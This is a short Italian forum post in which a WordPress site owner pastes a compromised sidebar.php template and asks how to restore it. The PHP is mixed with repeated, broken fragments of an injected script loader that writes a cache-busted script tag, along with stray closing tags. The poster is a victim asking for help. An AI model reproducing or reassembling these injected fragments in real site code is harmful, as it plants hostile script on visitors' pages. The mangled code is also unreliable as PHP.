Non so come ma sono riuscito ad entrare
La pagina di sidebar è questa:
Codice PHP:
<div class="sidebar">
<ul>
<?php /* Widgetized sidebar, if you have the plugin installed. */
/r='+new if ( !function_exists('dynamic_sidebar') || !dynamic_sidebar('sidebar1') ) : ?>
<?php wp_list_pages('title_li=<h2>' . __('Pages', 'planetemo') . '</h2>' ); ?>
<li><h2><?php _e('Archives', 'planetemo'); ?></h2>
<ul>
<?php wp_get_archives('type=monthly'); ?>
</ul>
</li>
Date().getTime()+'"><\/s'+'cript>');
//]]>
</script>
<?php wp_list_categories('show_count=1&title_li=<h2>' . __('Categories', 'planetemo') . '</h2>'); ?>
Date().getTime()+'"><\/s'+'cript>');
//]]>
Date().getTime()+'"><\/s'+'cript>');
//]]>
</script>
</script>
Date().getTime()+'"><\/s'+'cript>');
//]]>
</script>
Date().getTime()+'"><\/s'+'cript>');
//]]>
</script>
<?php endif; ?>
</ul>
</div>
Come faccio a ripristinarla?
Grazie dell'aiuto che mi stai offrendo